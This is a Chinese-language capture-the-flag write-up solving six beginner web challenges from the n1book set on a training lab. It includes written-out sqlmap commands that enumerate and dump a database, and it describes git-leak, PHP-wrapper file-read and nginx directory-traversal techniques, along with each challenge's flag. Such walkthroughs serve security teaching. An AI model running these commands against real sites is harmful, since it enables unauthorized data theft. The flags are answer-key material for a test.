第一题:常见的信息搜集

进入靶场环境:

题目内容说明flag一共分为3部分,用dirsearch进行目录扫描

扫描完成,发现有三个可疑文件。
依次访问,首先访问robots.txt

根据robots协议里的路径路径访问文件,得到一部分flag

访问index.php~,得到第二部分flag

访问.index.php.swp,得到第三部分flag

将三部分flag拼接到一起获得完整flag:n1book{info_1s_v3ry_imp0rtant_hack}
第二题:粗心的小李

进入靶场环境:

根据页面文字提示,猜测本题考点是git泄露
手工测试是否存在Git泄露

存在Git泄露,利用GitHack脚本下载源码

发现一个index.html文件


发现flag:n1book{git_looks_s0_easyfun}
第三题:SQL注入-1

进入靶场环境:

根据题目名称猜测题目考点为:SQL注入,访问靶场环境发现参数id=1
由于sql盲注较为繁琐,这里直接使用sqlmap跑结果

sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id --dbs
发现四个数据库,查看note数据库内容。

构造新的sqlmap参数,查看数据库note内的所有表名
sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id -D "note" --tables

发现疑似放有flag数据的表,查看表内列名
sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id -D "note" -T "fl4g" --columns

查看表内数据
sqlmap -u "http://eci-2ze02m5x7onkfj468jxt.cloudeci1.ichunqiu.com/index.php?id=1" --batch -p id -D "note" -T "fl4g" -C "fllllag" --dump

发现flag:n1book{union_select_is_so_cool}
第四题:SQL注入-2

进入靶场环境

访问login.php

发现一个登录框,输入任意数据,通过bp抓包

将POST请求包保存到本地命名为2222.txt,用sqlmap脚本进行sql注入
sqlmap -r 2222.txt --batch -p name --dbs

发现名为note的数据库,查看此数据库下的所有表名
sqlmap -r 2222.txt --batch -p name -D "note" --tables

查看fl4g表内的列名
sqlmap -r 2222.txt --batch -p name -D "note" -T "fl4g" --columns

查看表内数据
sqlmap -r 2222.txt --batch -p name -D "note" -T "fl4g" -C "flag" --dump

发现flag:n1book{login_sqli_is_nice}
第五题:afr_1

进入靶场环境:

发现参数p=hello,页面输出了hello world!猜测本题考点是文件读取,并且自动添加后缀
通过php伪协议直接读取flag文件

对base64加密数据进行解密

发现flag:n1book{afr_1_solved}
第六题:afr_2

进入靶场环境

查看源码发现img目录

访问img目录

并没有发现flag文件

发现使用nginx/1.14.0中间件,猜想可能有目录穿越

发现flag文件,直接访问
下载后,发现flag,flag:n1book{afr_2_solved}